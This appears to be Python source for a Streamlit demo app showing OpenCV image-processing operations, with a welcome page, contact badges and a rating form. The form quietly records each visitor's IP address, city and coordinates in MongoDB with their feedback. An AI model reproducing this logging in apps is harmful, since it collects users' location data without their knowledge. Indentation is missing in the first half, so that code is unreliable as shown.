source_code,
version,
load_image,
load_image_PIL,
converted,
#download_button,
get_location_data,
download_button1 ,
convolve,
insert_data_mongodb,
average_ratings_mongodb,
source_code,
scrape_duckduckgo)
selected_boxes = (
"Welcome",
"Demo Adaptive Thresholding",
"Demo Auto Canny",
"Demo Canny Edge Detector",
"Demo Convolutions",
"Demo Image Gradients",
"Demo Morphological Operations",
"Demo Color Spaces",
"Demo Color Thresholding",
"Demo Smoothing and Blurring",
)
rand = ''.join(random.choice(string.ascii_lowercase) for i in range(10))
download = f'{rand}.jpeg'
language = 'python'
default_image = 'images/nice.jpeg'
button = 'Download Result Image'
original = 'Original Image'
code = 'Source Code'
mime_type = 'image/jpeg'
font = cv.FONT_HERSHEY_SIMPLEX
def app():
selected_box = st.sidebar.selectbox("Choosse on of the following", selected_boxes)
if selected_box == "Welcome":
welcome()
if selected_box == "Demo Adaptive Thresholding":
adaptive_thresholding()
if selected_box == "Demo Auto Canny":
auto_canny()
if selected_box == "Demo Canny Edge Detector":
canny_edge_detector()
if selected_box == "Demo Convolutions":
convolutions()
if selected_box == "Demo Image Gradients":
image_gradients()
if selected_box == "Demo Morphological Operations":
morphological_operations()
if selected_box == "Demo Color Thresholding":
thresholding()
if selected_box == "Demo Color Spaces":
color_spaces()
if selected_box == "Demo Smoothing and Blurring":
smoothing_blurring()
def welcome():
cols = st.columns(2)
with cols[0]:
st.title('Basic Image Processing Operations')
st.image('images/image_processing.jpeg',use_column_width=True)
st.title('Usage')
st.markdown('A simple app that shows different image processing techniques. You can choose the options from the dropdwon menu on the left.' +
'Technologies use to build the app:', unsafe_allow_html=True)
st.title('Technology Stack')
st.markdown('''
<p align="center">
<img src="https://img.shields.io/badge/Python-FFD43B?style=for-the-badge&logo=python&logoColor=blue" />
<img src="https://img.shields.io/badge/MongoDB-4EA94B?style=for-the-badge&logo=mongodb&logoColor=white" />
<img src="https://img.shields.io/badge/Streamlit-FF4B4B?style=for-the-badge&logo=Streamlit&logoColor=white" />
<img src="https://img.shields.io/badge/OpenCV-27338e?style=for-the-badge&logo=OpenCV&logoColor=white" />
<img src="https://img.shields.io/badge/Visual_Studio_Code-0078D4?style=for-the-badge&logo=visual%20studio%20code&logoColor=white" />
</p>''', unsafe_allow_html=True)
with cols[1]:
st.title('Image Processing Techniques')
st.markdown('''
>Morphological Operations --- OpenCV Morphological Operations
>
>Smoothing and Blurring --- OpenCV Smoothing and Blurring
>
>Color Spaces -- OpenCV Color Spaces (cv2.cvtColor)
>
>Basic Thresholding --- OpenCV Thresholding (cv2.threshold)
>
>Adaptive Thresholding --- Adaptive Thresholding with OpenCV (cv2.adaptiveThreshold)
>
>Kernels --- Convolutions with OpenCV and Python
>
>Image Gradients --- Image Gradients with OpenCV (Sobel and Scharr)
>
>Edge Detection --- OpenCV Edge Detection (cv2.Canny)
>
>Automatic Edge Detection --- Zero-parameter, automatic Canny edge detection with Python and OpenCV''', unsafe_allow_html=True)
st.title('Dedication')
st.markdown('''> To my Mother (Elsa), Paula, Cris, Maty and Sofia, To whom made this possible.
>
> Special thanks to Adrian from pyimagesearch.com for great tutorials of image processing, deep learning, augmented realty, etc. ''')
st.markdown('''> Long Live Rock N Roll.
>
> - "Well if I have to, I will die seven deaths just to lie In the arms of my eversleeping aim"''')
st.title('Contact')
st.markdown('''<p align="center">
<a href="mailto:jjaramillo34@gmail.com" rel="nofollow">
<img alt="Gmail" src="https://img.shields.io/badge/Gmail-D14836?style=for-the-badge&logo=gmail&logoColor=white"/>
</a>
<a href="https://github.com/jjaramillo34/" rel="nofollow">
<img alt="Github" src="https://img.shields.io/badge/GitHub-%2312100E.svg?&style=for-the-badge&logo=Github&logoColor=white"/>
</a>
<a href="https://twitter.com/jejaramilloc" rel="nofollow">
<img alt="Twitter" src="https://img.shields.io/badge/Twitter-1DA1F2?style=for-the-badge&logo=twitter&logoColor=white"/>
</a>
<a href="https://www.linkedin.com/in/javierjaramillo1/" rel="nofollow">
<img alt="Linkedin" src="https://img.shields.io/badge/LinkedIn-0077B5?style=for-the-badge&logo=linkedin&logoColor=white"/>
</a>
</p>''', unsafe_allow_html=True)
location_dict = get_location_data()
date_r = datetime.now()
city = location_dict['city']
ip = location_dict['ip']
region = location_dict['region']
country = location_dict['country']
loc = location_dict['loc']
with st.sidebar.form(key='columns_in_form',clear_on_submit=True): #set clear_on_submit=True so that the form will be reset/cleared once it's submitted
rating=st.slider("Please rate the app", min_value=1, max_value=5, value=3,help='Drag the slider to rate the app. This is a 1-5 rating scale where 5 is the highest rating')
feedback=st.text_input(label='Please leave your feedback here')
submitted = st.form_submit_button('Submit')
if submitted:
st.write('Thanks for your feedback!')
st.markdown('Your Rating:')
st.markdown(rating)
st.markdown('Your Feedback:')
st.markdown(feedback)
insert_data_mongodb(rating=rating, feedback=feedback, date_r=date_r, city=city, ip=ip, region=region, country=country, loc=loc)
score_average = average_ratings_mongodb()
if score_average == 5.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=4.0 and score_average < 5.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=3.0 and score_average < 4.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average >=2.0 and score_average < 3.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
elif score_average < 2.0:
st.sidebar.title('App Ratings')
st.sidebar.markdown(f'⭐ <p style="font-weight:bold;color:green;font-size:20px;border-radius:2%;">{round(score_average, 1)}</p>', unsafe_allow_html=True)
st.sidebar.markdown(f'<p style="font-weight:bold;color:black;font-size:12px;border-radius:2%;">Ratings live atlas mongodb database feed</p>', unsafe_allow_html=True)
with st.expander('Show MongoDB Dashboard'):
components.iframe('https://charts.mongodb.com/charts-project-0-koqvp/public/dashboards/62523657-6131-48ab-8c6c-3893cfb849fa', height=800)
version()
def adaptive_thresholding():
st.header("Demo Adaptive Thresholding")
options = st.sidebar.radio('Adaptive Thresholding Options', ('Adaptive Thresholding', 'Adaptive Thesholding Interactive'))
if options == 'Adaptive Thresholding':
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'], key='1')
if img_file is not None:
# load the image and display it
with st.expander('Show Original Image'):
image = load_image_PIL(img_file)
image = converted(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding', expanded=True):
cols = st.columns(4)
(T, threshInv) = cv.threshold(blurred, 51, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown("Simple Thresholding")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu Thresholding")
cols[1].image(threshInv)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 21, 10)
cols[2].markdown("Mean Adaptive Thresholding")
cols[2].image(threshInv)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 21, 4)
cols[3].markdown("Gaussian Adaptive Thresholding")
cols[3].image(thresh)
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
with st.expander("Show Adaptive Thresholding Types Interactive"):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
ret,thresh1 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
ret,thresh2 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
ret,thresh3 = cv.threshold(blurred, x, 255, cv.THRESH_TRUNC)
ret,thresh4 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO)
ret,thresh5 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO_INV)
titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']
images = [blurred, thresh1, thresh2, thresh3, thresh4, thresh5]
cols = st.columns(3)
for i in range(0, 3):
cols[i].markdown(i)
cols[i].markdown(titles[i])
cols[i].image(images[i])
with cols[i]:
download_button1(images[i], button, download, mime_type, key='{i}.1.1')
cols = st.columns(3)
for i in range(3, 6):
cols[i-3].markdown(i)
cols[i-3].markdown(titles[i])
cols[i-3].image(images[i])
with cols[i- 3]:
download_button1(images[i], button, download, mime_type, key='{i}.2.2')
else:
# load the image and display it
with st.expander('Show Original Image'):
image = load_image('images/steve-jobs.jpg')
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding', expanded=True):
cols = st.columns(4)
(T, threshInv) = cv.threshold(blurred, 51, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown("Simple Thresholding")
cols[0].image(threshInv)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu Thresholding")
cols[1].image(threshInv)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 21, 10)
cols[2].markdown("Mean Adaptive Thresholding")
cols[2].image(threshInv)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 21, 4)
cols[3].markdown("Gaussian Adaptive Thresholding")
cols[3].image(thresh)
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
with st.expander("Show Adaptive Thresholding Types Interactive"):
x = st.slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
ret,thresh1 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY)
ret,thresh2 = cv.threshold(blurred, x, 255, cv.THRESH_BINARY_INV)
ret,thresh3 = cv.threshold(blurred, x, 255, cv.THRESH_TRUNC)
ret,thresh4 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO)
ret,thresh5 = cv.threshold(blurred, x, 255, cv.THRESH_TOZERO_INV)
titles = ['Original Image','BINARY','BINARY_INV','TRUNC','TOZERO','TOZERO_INV']
images = [blurred, thresh1, thresh2, thresh3, thresh4, thresh5]
cols = st.columns(3)
for i in range(0, 3):
cols[i].markdown(i)
cols[i].markdown(titles[i])
cols[i].image(images[i])
with cols[i]:
download_button1(images[i], button, download, mime_type, key='{i}.1.1')
cols = st.columns(3)
for i in range(3, 6):
cols[i-3].markdown(i)
cols[i-3].markdown(titles[i])
cols[i-3].image(images[i])
with cols[i- 3]:
download_button1(images[i], button, download, mime_type, key='{i}.2.2')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'], key='1')
if img_file is not None:
with st.expander('Show Original Image'):
image = load_image_PIL(img_file)
image = converted(image)
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding Interactive', expanded=True):
cols = st.columns(4)
x = cols[0].slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
(T, threshInv) = cv.threshold(blurred, x, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown('Simple Thresholding')
cols[0].image(threshInv, use_column_width=True,clamp = True)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
x = cols[1].slider('Change Threshold value', min_value = 50, max_value = 255, key='2', help='Auto threshold value selected')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu's Automatic Thresholding")
cols[1].image(threshInv, use_column_width=True,clamp = True)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
x = cols[2].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='3')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, x, 10)
cols[2].markdown('Mean Adaptive Thresholding')
cols[2].image(thresh, use_column_width=True,clamp = True)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
x = cols[3].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='4')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, x, 4)
cols[3].markdown('Gaussian Adaptive Thresholding')
cols[3].image(thresh, use_column_width=True,clamp = True)
cols[3].text("Bar Chart of the image")
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
else:
with st.expander('Show Original Image'):
image = load_image('images/steve-jobs.jpg')
# convert the image to grayscale and blur it slightly
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
blurred = cv.GaussianBlur(gray, (7, 7), 0)
st.image(image)
with st.expander('Show Adaptive Thresholding Interactive', expanded=True):
cols = st.columns(4)
x = cols[0].slider('Change Threshold value', min_value = 50, max_value = 255, key='1')
(T, threshInv) = cv.threshold(blurred, x, 255,
cv.THRESH_BINARY_INV)
cols[0].markdown('Simple Thresholding')
cols[0].image(threshInv, use_column_width=True,clamp = True)
with cols[0]:
download_button1(threshInv, button, download, mime_type, key='1.1')
x = cols[1].slider('Change Threshold value', min_value = 50, max_value = 255, key='2', disabled=True, help='Auto threshold value selected')
# apply Otsu's automatic thresholding
(T, threshInv) = cv.threshold(blurred, 0, 255,
cv.THRESH_BINARY_INV | cv.THRESH_OTSU)
cols[1].markdown("Otsu's Automatic Thresholding")
cols[1].image(threshInv, use_column_width=True,clamp = True)
with cols[1]:
download_button1(threshInv, button, download, mime_type, key='1.2')
x = cols[2].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='3')
# instead of manually specifying the threshold value, we can use adaptive thresholding to examine neighborhoods
# of pixels and adaptively threshold each neighborhood
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, x, 10)
cols[2].markdown('Mean Adaptive Thresholding')
cols[2].image(thresh, use_column_width=True,clamp = True)
with cols[2]:
download_button1(thresh, button, download, mime_type, key='1.3')
x = cols[3].slider('Change Threshold value', min_value = 21, max_value = 255, step = 2 ,key='4')
# perform adaptive thresholding again, this time using a Gaussian weighting versus a simple mean to compute our
# local threshold value
thresh = cv.adaptiveThreshold(blurred, 255,
cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, x, 4)
cols[3].markdown('Gaussian Adaptive Thresholding')
cols[3].image(thresh, use_column_width=True,clamp = True)
cols[3].text("Bar Chart of the image")
with cols[3]:
download_button1(thresh, button, download, mime_type, key='1.4')
source_code(
'Source Code + Adaptive Thresholding pyimagesearch.com',
'https://pyimagesearch.com/2021/05/12/adaptive-thresholding-with-opencv-cv2-adaptivethreshold/',
'https://gist.github.com/jjaramillo34/331a1aaeebeb4ff47d9b80a658643b60')
with st.expander('DuckDuckGo Search Results'):
st.subheader('More About Adaptive Thresholding')
#scrape_duckduckgo('adaptive thresholding opencv')
scrape_duckduckgo('adaptive thresholding opencv')
def auto_canny():
    """Render the Auto Canny demo.

    Compares a "wide", a "tight", and an automatically tuned Canny edge
    map (via ``auto_canny_thresh``) for an uploaded image, falling back to
    the default image when nothing is uploaded.
    """
    st.header("Auto Canny Demo")
    # Checkbox is rendered for UI parity with the other demos; its value
    # is not consulted in this demo.
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    # Load the image (uploaded or default); the two branches previously
    # duplicated the whole demo — only the load step actually differs.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)
    # Convert to grayscale and blur slightly before edge detection.
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
    blurred = cv.GaussianBlur(gray, (3, 3), 0)
    # Apply Canny edge detection using a wide threshold, a tight threshold,
    # and an automatically determined threshold.
    wide = cv.Canny(blurred, 10, 200)
    tight = cv.Canny(blurred, 225, 250)
    auto = auto_canny_thresh(blurred)
    images = [wide, tight, auto]
    labels = ['Wide Edges', 'Tight Edges', 'Auto Canny']
    # Show the original image and the three edge maps with download buttons.
    with st.expander('Show Original Image'):
        st.markdown("Original")
        st.image(image)
    with st.expander('Show Auto Canny', expanded=True):
        cols = st.columns(3)
        # Loop variable renamed from `image` so the source image is not
        # shadowed/overwritten while rendering.
        for i, edge_map in enumerate(images):
            cols[i].markdown(labels[i])
            cols[i].image(edge_map)
            with cols[i]:
                download_button1(edge_map, button, download, mime_type, key=f'{i}.1')
    source_code(
        'Source Code + Auto Canny pyimagesearch.com',
        'https://pyimagesearch.com/2015/04/06/zero-parameter-automatic-canny-edge-detection-with-python-and-opencv/',
        'https://gist.github.com/jjaramillo34/fb83acff62ce6502c398ba7133ab066c')
    with st.expander('DuckDuckGo Search Results'):
        st.subheader('More About Auto Canny')
        scrape_duckduckgo('auto canny opencv')
def convolutions():
    """Render the Convolutions demo.

    Applies a bank of classic kernels (blurs, sharpen, Laplacian, Sobel
    x/y) to a grayscale image using both the custom ``convolve`` function
    and OpenCV's ``filter2D``, then shows the source code listings.
    """
    # Bug fix: header previously said "Resizing Demo" (copy-paste error).
    st.header("Convolutions Demo")
    # Bug fix: 'jpge' -> 'jpeg' so .jpeg uploads are accepted.
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    # Rendered for UI parity with the other demos; not consulted here.
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    # Bug fix: the uploaded image was previously loaded and then ignored —
    # the entire demo only ran in the else branch on the default image.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image('images/supermario.jpg')
    # construct average blurring kernels used to smooth an image
    smallBlur = np.ones((7, 7), dtype="float") * (1.0 / (7 * 7))
    largeBlur = np.ones((21, 21), dtype="float") * (1.0 / (21 * 21))
    # construct a sharpening filter
    sharpen = np.array((
        [0, -1, 0],
        [-1, 5, -1],
        [0, -1, 0]), dtype="int")
    # construct the Laplacian kernel used to detect edge-like regions of an image
    laplacian = np.array((
        [0, 1, 0],
        [1, -4, 1],
        [0, 1, 0]), dtype="int")
    # construct the Sobel x-axis kernel
    sobelX = np.array((
        [-1, 0, 1],
        [-2, 0, 2],
        [-1, 0, 1]), dtype="int")
    # construct the Sobel y-axis kernel
    sobelY = np.array((
        [-1, -2, -1],
        [0, 0, 0],
        [1, 2, 1]), dtype="int")
    # construct the kernel bank, a list of kernels we're going to apply using both our
    # custom `convole` function and OpenCV's `filter2D` function
    kernelBank = (
        ("small_blur", smallBlur),
        ("large_blur", largeBlur),
        ("sharpen", sharpen),
        ("laplacian", laplacian),
        ("sobel_x", sobelX),
        ("sobel_y", sobelY)
    )
    # convert the input image to grayscale before filtering
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
    # loop over the kernels, showing custom vs OpenCV output side by side
    with st.spinner('Creating Convolutions please wait for it...'):
        for (kernelName, kernel) in kernelBank:
            st.write("[INFO] applying {} kernel".format(kernelName))
            convoleOutput = convolve(gray, kernel)
            opencvOutput = cv.filter2D(gray, -1, kernel)
            col1, col2, col3 = st.columns(3)
            with col1:
                st.markdown("original")
                st.image(gray)
            with col2:
                st.write("{} - convole".format(kernelName))
                st.image(convoleOutput)
            with col3:
                st.write("{} - opencv".format(kernelName))
                st.image(opencvOutput)
    st.success('Convolutions were created succesfully!')
    with st.expander('Source Code'):
        col1, col2 = st.columns(2)
        with col1:
            st.markdown(code)
            st.code('''
# construct average blurring kernels used to smooth an image
smallBlur = np.ones((7, 7), dtype="float") * (1.0 / (7 * 7))
largeBlur = np.ones((21, 21), dtype="float") * (1.0 / (21 * 21))
# construct a sharpening filter
sharpen = np.array((
    [0, -1, 0],
    [-1, 5, -1],
    [0, -1, 0]), dtype="int")
# construct the Laplacian kernel used to detect edge-like regions of an image
laplacian = np.array((
    [0, 1, 0],
    [1, -4, 1],
    [0, 1, 0]), dtype="int")
# construct the Sobel x-axis kernel
sobelX = np.array((
    [-1, 0, 1],
    [-2, 0, 2],
    [-1, 0, 1]), dtype="int")
# construct the Sobel y-axis kernel
sobelY = np.array((
    [-1, -2, -1],
    [0, 0, 0],
    [1, 2, 1]), dtype="int")
# construct the kernel bank, a list of kernels we're going to apply using both our
# custom `convole` function and OpenCV's `filter2D` function
kernelBank = (
    ("small_blur", smallBlur),
    ("large_blur", largeBlur),
    ("sharpen", sharpen),
    ("laplacian", laplacian),
    ("sobel_x", sobelX),
    ("sobel_y", sobelY)
)
# load the input image and convert it to grayscale
image = load_image('images/supermario.jpg')
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
# loop over the kernels
with st.spinner('Creating Convolutions please wait for it...'):
    for (kernelName, kernel) in kernelBank:
        # apply the kernel to the grayscale image using both our custom 'convole'
        # function and OpenCV's 'filter2D' function
        st.write("[INFO] applying {} kernel".format(kernelName))
        convoleOutput = convolve(gray, kernel)
        opencvOutput = cv.filter2D(gray, -1, kernel)
        # show the output images
        col1, col2, col3 = st.columns(3)
        with col1:
            st.markdown("original")
            st.image(gray)
        with col2:
            st.write("{} - convole".format(kernelName))
            st.image(convoleOutput)
        with col3:
            st.write("{} - opencv".format(kernelName))
            st.image(opencvOutput)''', language=language)
        with col2:
            st.markdown('Source Code Convole Function')
            st.code('''
def convolve(image, kernel):
    # grab the spatial dimensions of the image, along with
    # the spatial dimensions of the kernel
    (iH, iW) = image.shape[:2]
    (kH, kW) = kernel.shape[:2]
    # allocate memory for the output image, taking care to
    # "pad" the borders of the input image so the spatial
    # size (i.e., width and height) are not reduced
    pad = (kW - 1) // 2
    image = cv2.copyMakeBorder(image, pad, pad, pad, pad,
        cv2.BORDER_REPLICATE)
    output = np.zeros((iH, iW), dtype="float32")
    # loop over the input image, "sliding" the kernel across
    # each (x, y)-coordinate from left-to-right and top to
    # bottom
    for y in np.arange(pad, iH + pad):
        for x in np.arange(pad, iW + pad):
            # extract the ROI of the image by extracting the
            # *center* region of the current (x, y)-coordinates
            # dimensions
            roi = image[y - pad:y + pad + 1, x - pad:x + pad + 1]
            # perform the actual convolution by taking the
            # element-wise multiplicate between the ROI and
            # the kernel, then summing the matrix
            k = (roi * kernel).sum()
            # store the convolved value in the output (x,y)-
            # coordinate of the output image
            output[y - pad, x - pad] = k
    # rescale the output image to be in the range [0, 255]
    output = rescale_intensity(output, in_range=(0, 255))
    output = (output * 255).astype("uint8")
    # return the output image
    return output''', language=language)
    with st.expander('Convolutions with OpenCV and Python'):
        # embed the tutorial page in an iframe
        components.iframe("https://pyimagesearch.com/2016/07/25/convolutions-with-opencv-and-python/", height=800)
    version()
def canny_edge_detector():
    """Render the Canny Edge Detector demo.

    Two modes selected from the sidebar:
      * "Canny Edge Detector" — fixed wide/mid/tight threshold edge maps.
      * "Canny Edge Detector Interactive" — the same maps driven by
        range sliders.
    Works on an uploaded image, or the default image when none is given.
    """
    st.header("Canny Edge Detector Demo")
    # Bug fix: 'jpge' -> 'jpeg' so .jpeg uploads are accepted.
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'], key='1')
    # Rendered for UI parity with the other demos; not consulted here.
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    options = st.sidebar.radio('Canny Edge Detector Options', ('Canny Edge Detector', 'Canny Edge Detector Interactive'))
    # Bug fix: the interactive branch previously loaded the uploaded image
    # and then overwrote it with the default image, so uploads were ignored.
    # The four near-identical branches (2 modes x uploaded/default) are
    # collapsed: only the load step depends on the upload.
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)
    # Convert to grayscale and blur slightly before edge detection.
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
    blurred = cv.GaussianBlur(gray, (5, 5), 0)
    col1, col2 = st.columns(2)
    with col1:
        with st.expander('Show Original Image'):
            st.markdown("Original")
            st.image(image)
    with col2:
        with st.expander('Show Blurred Image'):
            st.markdown("Blurred")
            st.image(blurred)
    # Compute "wide", "mid-range", and "tight" thresholded edge maps.
    col1, col2, col3 = st.columns(3)
    if options == 'Canny Edge Detector':
        wide = cv.Canny(blurred, 10, 200)
        mid = cv.Canny(blurred, 30, 150)
        tight = cv.Canny(blurred, 240, 250)
        with col1:
            st.markdown("Wide Edge Map")
            st.image(wide)
        with col2:
            st.markdown("Mid Edge Map")
            st.image(mid)
        with col3:
            st.markdown("Tight Edge Map")
            st.image(tight)
    else:
        # Interactive mode: each map gets its own (low, high) range slider.
        with col1:
            values = st.slider(
                'Select a range of values',
                10, 200, (10, 200), step=10)
            wide = cv.Canny(blurred, values[0], values[1])
            st.markdown("Wide Edge Map")
            st.image(wide)
        with col2:
            values = st.slider(
                'Select a range of values',
                30, 150, (30, 150), step=5)
            mid = cv.Canny(blurred, values[0], values[1])
            st.markdown("Mid Edge Map")
            st.image(mid)
        with col3:
            values = st.slider(
                'Select a range of values',
                200, 250, (200, 250))
            tight = cv.Canny(blurred, values[0], values[1])
            st.markdown("Tight Edge Map")
            st.image(tight)
def image_gradients():
    """Render the Image Gradient demo.

    Two modes selected from the sidebar:
      * "Sobel/Scharr" — x/y gradients and their weighted combination.
      * "Magnitude Orientation" — gradient magnitude and orientation,
        shown both as JET colormapped images and as a matplotlib figure.
    Works on an uploaded image, or the default image when none is given.
    """
    st.header("Image Gradient Demo")
    options = st.sidebar.radio('Image Gradient Options', ('Sobel/Scharr', 'Magnitude Orientation'))
    # Bug fix: 'jpge' -> 'jpeg' so .jpeg uploads are accepted. The uploader
    # was duplicated per branch; one instance serves both modes.
    img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpeg'])
    # Rendered for UI parity with the other demos; not consulted here.
    realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
    if img_file is not None:
        image = converted(load_image_PIL(img_file))
    else:
        image = load_image(default_image)
    gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
    if options == 'Sobel/Scharr':
        with st.expander('Show Sobel/Scharr Image Gradient', expanded=True):
            # Kernel size selects the operator: ksize=-1 means Scharr,
            # ksize=3 means the standard 3x3 Sobel operator.
            op = st.selectbox('Operators', ('sobel', 'scharr'))
            s = 1 if op == 'scharr' else 0
            st.success(f'Operator Selected: {op}')
            ksize = -1 if s > 0 else 3
            gX = cv.Sobel(gray, ddepth=cv.CV_32F, dx=1, dy=0, ksize=ksize)
            gY = cv.Sobel(gray, ddepth=cv.CV_32F, dx=0, dy=1, ksize=ksize)
            # The gradients are floating point; convert back to uint8 so
            # other OpenCV functions can operate on/visualize them.
            gX = cv.convertScaleAbs(gX)
            gY = cv.convertScaleAbs(gY)
            # Combine the two gradient representations into a single image.
            combined = cv.addWeighted(gX, 0.5, gY, 0.5, 0)
            cols = st.columns(4)
            cols[0].markdown("Gray")
            cols[0].image(gray)
            cols[1].markdown("Sobel/Scharr X")
            cols[1].image(gX)
            with cols[1]:
                download_button1(gX, button, download, mime_type, key='1.1')
            cols[2].markdown("Sobel/Scharr Y")
            cols[2].image(gY)
            with cols[2]:
                download_button1(gY, button, download, mime_type, key='1.2')
            cols[3].markdown("Sobel/Scharr Combined")
            cols[3].image(combined)
            with cols[3]:
                download_button1(combined, button, download, mime_type, key='1.3')
    else:
        # Compute gradients along the x and y axis, respectively.
        gX = cv.Sobel(gray, cv.CV_64F, 1, 0)
        gY = cv.Sobel(gray, cv.CV_64F, 0, 1)
        # Gradient magnitude and orientation (folded into [0, 180) degrees).
        magnitude = np.sqrt((gX ** 2) + (gY ** 2))
        orientation = np.arctan2(gY, gX) * (180 / np.pi) % 180
        # Consistency fix: both branches now use COLORMAP_JET (the default
        # branch previously used COLORMAP_OCEAN for magnitude only) and
        # both images are displayed with channels='BGR'.
        dist1 = cv.convertScaleAbs(magnitude)
        imC1 = cv.applyColorMap(dist1, cv.COLORMAP_JET)
        dist2 = cv.convertScaleAbs(orientation)
        imC2 = cv.applyColorMap(dist2, cv.COLORMAP_JET)
